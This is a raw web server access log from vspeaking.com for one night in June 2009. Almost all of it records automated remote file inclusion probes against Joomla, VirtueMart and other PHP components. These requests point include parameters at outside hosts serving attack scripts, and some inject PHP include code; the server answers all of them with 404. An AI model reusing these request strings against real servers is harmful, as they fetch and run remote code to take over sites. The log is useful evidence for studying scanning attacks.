195.34.78.110 - - [28/Jun/2009:22:40:27 -0700] "GET /logs/access.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:22:40:40 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:22:40:40 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:22:40:40 -0700] "GET /logs/access.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:22:40:50 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:22:40:50 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
195.34.78.110 - - [28/Jun/2009:22:40:50 -0700] "GET /logs/access.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
210.220.213.203 - - [28/Jun/2009:22:41:40 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
210.220.213.203 - - [28/Jun/2009:22:41:40 -0700] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
210.220.213.203 - - [28/Jun/2009:22:41:40 -0700] "GET /logs/access_090413.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.kodae.ms.kr///_private/feelcomz/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
110.45.144.164 - - [28/Jun/2009:22:45:30 -0700] "GET /logs/access_090126.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.164 - - [28/Jun/2009:22:45:31 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.164 - - [28/Jun/2009:22:45:31 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:47:08 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:47:08 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:47:08 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:47:46 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:47:46 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "vspeaking.com"
218.234.21.178 - - [28/Jun/2009:22:47:46 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "vspeaking.com"
110.45.144.33 - - [28/Jun/2009:22:49:12 -0700] "GET /logs/access_090126.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.33 - - [28/Jun/2009:22:49:13 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.144.33 - - [28/Jun/2009:22:49:13 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
209.172.33.230 - - [28/Jun/2009:22:50:25 -0700] "GET /logs/access.log//index.php?sayfa=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
94.23.2.21 - - [28/Jun/2009:22:52:24 -0700] "GET /logs/access_090126.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
94.23.2.21 - - [28/Jun/2009:22:52:24 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
94.23.2.21 - - [28/Jun/2009:22:52:24 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.vspeaking.com"
124.0.103.194 - - [28/Jun/2009:22:58:27 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.0.103.194 - - [28/Jun/2009:22:58:27 -0700] "GET /logs/access_090413.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.0.103.194 - - [28/Jun/2009:22:58:27 -0700] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
201.232.54.48 - - [28/Jun/2009:23:01:04 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
201.232.54.48 - - [28/Jun/2009:23:01:04 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
201.232.54.48 - - [28/Jun/2009:23:01:04 -0700] "GET /logs/access_090413.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:23:04:49 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:23:04:49 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:23:04:49 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:07:55 -0700] "GET /logs//administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:07:57 -0700] "GET /administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:07:57 -0700] "GET /logs//administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:07:58 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:08:00 -0700] "GET /administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:08:00 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:10:01 -0700] "GET /administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:10:01 -0700] "GET /logs//administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:10:01 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:10:15 -0700] "GET /logs//administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:10:15 -0700] "GET /administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:10:15 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/ps_product.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
200.93.147.154 - - [28/Jun/2009:23:12:00 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
200.93.147.154 - - [28/Jun/2009:23:12:00 -0700] "GET /logs/access.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
200.93.147.154 - - [28/Jun/2009:23:12:00 -0700] "GET /logs//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
95.154.202.203 - - [28/Jun/2009:23:12:23 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; BuiltWith/0.3; +http://builtwith.com/bot.html)" "vspeaking.com"
200.93.147.154 - - [28/Jun/2009:23:12:48 -0700] "GET /logs/access.log%20%20//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
200.93.147.154 - - [28/Jun/2009:23:12:48 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
200.93.147.154 - - [28/Jun/2009:23:12:48 -0700] "GET /logs//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
200.93.147.154 - - [28/Jun/2009:23:12:48 -0700] "GET /logs//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
200.93.147.154 - - [28/Jun/2009:23:12:48 -0700] "GET /logs/access.log%20%20//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
200.93.147.154 - - [28/Jun/2009:23:12:51 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:13:16 -0700] "GET /administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:13:16 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:13:16 -0700] "GET /logs//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:13:16 -0700] "GET /logs//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:13:16 -0700] "GET /administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:13:16 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
200.93.147.154 - - [28/Jun/2009:23:13:59 -0700] "GET /logs/access.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
200.93.147.154 - - [28/Jun/2009:23:13:59 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
200.93.147.154 - - [28/Jun/2009:23:13:59 -0700] "GET /logs//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:23:14:20 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:23:14:20 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:23:14:20 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
218.234.21.178 - - [28/Jun/2009:23:14:20 -0700] "GET /logs/access.log%22%20%20target=%22_blank//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:14:33 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:14:38 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/html/shop.browse.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:18:31 -0700] "GET /logs/administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:18:31 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:18:32 -0700] "GET /administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:18:35 -0700] "GET /administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:18:35 -0700] "GET /logs/administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:18:35 -0700] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
65.55.230.188 - - [28/Jun/2009:23:18:41 -0700] "GET /logs/ HTTP/1.1" 200 2368 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
124.0.139.129 - - [28/Jun/2009:23:19:41 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.0.139.129 - - [28/Jun/2009:23:19:41 -0700] "GET /logs//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.0.139.129 - - [28/Jun/2009:23:19:41 -0700] "GET /administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.0.139.129 - - [28/Jun/2009:23:22:40 -0700] "GET /logs//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.0.139.129 - - [28/Jun/2009:23:22:40 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.0.139.129 - - [28/Jun/2009:23:22:41 -0700] "GET /administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:23:23 -0700] "GET /administrator/components/com_virtuemart/errors.php?error=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:23:23 -0700] "GET /logs//administrator/components/com_virtuemart/errors.php?error=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:23:23 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/errors.php?error=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:23:24 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/errors.php?error=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:23:24 -0700] "GET /administrator/components/com_virtuemart/errors.php?error=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:23:24 -0700] "GET /logs//administrator/components/com_virtuemart/errors.php?error=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:24:48 -0700] "GET /administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:24:48 -0700] "GET /logs//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:24:48 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/classes/ps_session.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:26:43 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/languages/common/english.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:26:46 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/intro.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.0.139.129 - - [28/Jun/2009:23:26:46 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:26:46 -0700] "GET //administrator/components/com_virtuemart/intro.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.105.116 - - [28/Jun/2009:23:26:46 -0700] "GET /logs///administrator/components/com_virtuemart/intro.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:26:52 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/errors.php?error=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
122.153.28.140 - - [28/Jun/2009:23:26:52 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/errors.php?error=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
124.0.139.129 - - [28/Jun/2009:23:26:59 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
